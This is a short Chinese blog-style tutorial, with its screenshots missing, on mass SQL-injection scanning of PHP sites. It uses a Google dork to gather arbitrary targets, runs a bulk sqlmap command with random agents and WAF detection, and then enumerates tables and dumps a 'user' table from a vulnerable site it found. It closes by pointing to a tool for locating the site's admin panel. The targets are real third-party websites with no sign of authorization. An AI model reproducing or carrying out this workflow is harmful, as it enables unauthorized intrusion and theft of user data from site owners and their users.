1. 程式人生 > >sqlmap測試php實戰

sqlmap測試php實戰

針對 -1 技術分享 bat 寫到 重連 技術 連接 waf

在Google上搜索inurl:php?id=

將搜集的url寫到一個文件當中url.txt中

技術分享

sqlmap -m url.txt --random-agent --thread=10 --timeout=5 --batch --retries=1 --identify-waf
-m指定url文件

--random-agent 使用隨機代理

--thread=10 設置線程數為10

--timeout=5 連接超時5秒放棄

--batch 掃描過程中遇到選項時選擇默認選項

--retries 連接失敗嘗試一次重連

--identify-waf 遇到waf的站點跳過

技術分享

經過一段時間的掃描,掃描到一個存在sql註入漏洞的站點

技術分享

掃描所有的表

技術分享

技術分享

針對其中的一個表user

技術分享

掃描這個表

--dump 獲取表內容

-T user指定表

技術分享

獲取到表的內容

技術分享

找後臺可以用禦劍

sqlmap測試php實戰